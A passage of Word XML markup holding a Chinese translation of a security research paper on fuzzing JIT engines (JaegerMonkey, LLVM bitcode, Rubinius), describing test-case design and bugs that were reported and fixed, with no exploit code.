          <w:sz w:val="27"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D6D38CF" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1120"/>
        </w:tabs>
        <w:ind w:left="400"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>-j</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>启用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>TraceMonkey</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>跟踪</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>JIT</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="522930E5" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:spacing w:before="33"/>
        <w:ind w:left="1120"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>此标志独立于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>-m</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>-a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="114596EA" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1120"/>
        </w:tabs>
        <w:spacing w:before="14"/>
        <w:ind w:left="400"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>-m</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>启用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>JaegerMonkey</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>方法</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>JIT</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="35BB3AB1" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1120"/>
        </w:tabs>
        <w:spacing w:before="33" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="1120" w:right="3897" w:hanging="721"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>-a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>始终使用方法</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>JIT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，忽略内部调整这仅对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>-m</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>有效</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC76E2B" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:sectPr w:rsidR="0026102A">
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="1500" w:right="1020" w:bottom="280" w:left="1280" w:header="720" w:footer="720" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FDA479A" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="75" w:line="280" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="438"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>在查看</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>JaegerMonkey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>源代码之后，我们获得了一些功能列表，可以通过根据自己的预期用途量身定制测试用例。我们研究了</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>JaegerMonkey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>源代码，以找到更复杂的快速路径生成器以及如何通过JavaScript来访问它们。读取</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>jsopcode.tbl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>文件是开始此过程的好地方。该文件定义了</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Sp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>ide</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>rMonkey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>字节码操作码。通过了解为给定的JavaScript块生成了哪些字节码操作码，我们可以更好地了解</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>JaegerMonkey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>编译器并跟踪JavaScript到字节码到本机代码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>的转换过程</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>。例如，字节码操作码JSOP_NOT表示逻辑NOT运算符（例如'！'）。</w:t>
      </w:r>
      <w:r>
        <w:t>通过查看Compiler.cpp文件并搜索在1170行中找到的操作码，我们可以找到JaegerMonkey中该操作码的编译位置。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F9D302" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="7"/>
        <w:rPr>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5220DB80" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:ind w:left="760"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>BEGIN_CASE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>JSOP_NOT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5191AD5E" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:spacing w:before="34"/>
        <w:ind w:left="760" w:right="7017" w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>jsop_not</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>（）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB4D041" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:spacing w:before="13"/>
        <w:ind w:left="760" w:right="7017"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>END_CASE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>JSOP_NOT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA6370A" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="469A43EA" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="126" w:line="278" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="442"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>该操作码触发对</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>JaegerMonkey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>中的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>jsop_not</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>函数的调用。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>我们可以在Fast</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Ops.cpp中找到其实现。这个例子很简单，该函数只</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>是从J</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>avaScript堆栈中弹出最上面的值并检查其类型。以这种方式遵循每条快速路径可以帮助为我们的模糊器建立第一轮测试用例。第一轮产生了超过60亿个测试用例，耗时近一周。我们将语法迭代分解为多个测试轮次，这些轮次针对特定主题，例如算术或以各种顺序使用各种参数调用多个对象方法。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="272C3436" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="5"/>
        <w:rPr>
          <w:sz w:val="29"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65DBCB0A" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="407"/>
      </w:pPr>
      <w:r>
        <w:t>我们的模糊器能够找到一些无趣的漏洞，例如NULL指针取消引用，并在SpiderMonkey和JaegerMonkey中触发了一些调试断言。它还在我们向Mozilla报告的SpiderMonkey引擎中发现了一个严重漏洞。您可以在本文结尾的附录A中找到有关此漏洞的更多信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C092D27" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="9"/>
        <w:rPr>
          <w:sz w:val="27"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="471607EF" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:spacing w:line="283" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="595"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>我们决定不发布JavaScript模糊测试器或其许多结果，除非我们可以对其进行修改以使其可与其他JavaScript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> JIT引擎一起运行。我们仍在用更好的工具（例如Google的Valgrind和AddressSanitizer）检测细微的内存损坏的工具进行测试。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="333B42B4" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="7"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="037AB5EE" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="27" w:name="_bookmark25"/>
      <w:bookmarkEnd w:id="27"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>LLVM语言运行时模糊</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A22A54" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="35"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="093E9B35" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="595"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>由于位码通常</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>是（特别是LLVM）二进制编码的数据，因此</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>诸如位</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>翻转之类的盲目的模糊测试很有价值。我们创建了一个临时的半智能模糊器（如</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D4E6B1" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:sectPr w:rsidR="0026102A">
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="1360" w:right="1020" w:bottom="280" w:left="1280" w:header="720" w:footer="720" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FA2F51C" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="75" w:line="295" w:lineRule="auto"/>
        <w:ind w:left="160"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>由于时间限制以及现有LLVM客户端应用程序普遍缺乏边界，因此LLVM的功能与完整的基于语法的模糊测试相反）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A200B9" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="2"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="670292F8" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="435"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>使用JavaScript引擎，可以清楚地定义安全边界。尽管在Ruby实现中不太正确，但通常了解构成可接受行为的原因。对于LLVM，这种情况不太明显，因为LLVM位代码/ API的信任取决于它的用例，并且处理位代码的组件是为提高性能而不是出于安全性而编写的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68CD2529" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="8"/>
        <w:rPr>
          <w:sz w:val="27"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21177368" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="1" w:line="283" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="595"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>LLVM中的位代码解析库以及整个编译器基础结构并不是在编译过程的任何阶段都是恶意的前提下开发的。但是，随着LLVM使用率的上升，我们仍然认为库滥用或IR验证不完整的未来潜力是有效的攻击方案。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB32AA2" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="6"/>
        <w:rPr>
          <w:sz w:val="27"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43775820" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="595"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>通过使用模糊器和手动代码审查，我们发现了LLVM的位代码解析（在</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>svn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> r133867中修复）中的问题。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="547CA435" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="10"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CB46443" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="28" w:name="_bookmark26"/>
      <w:bookmarkEnd w:id="28"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>鲁比尼乌斯（</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Rubinius</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>）模糊</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F774478" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="2"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="35"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D8A792C" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="280" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="368"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>为了定位</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Rubinius</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，我们使用了一个语法模糊器，它以与JavaScript模糊</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>器类似</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>的方式排列Ruby语言构造，并开始着手直接定位</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Rubinius</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>的字节码。我们从Ruby语言（而不是直接与字节码）开始，后来以更多Ruby JIT实现为目标（</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>MacRuby</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>也使用LLVM）。我们使用特定于Ruby领域的语言对目标语法进行建模，并在整个研究过程中对模糊测试方法进行了不断的更改。由于这项工作仍在进行中，我们将在以后保留结果和分析。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24577510" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
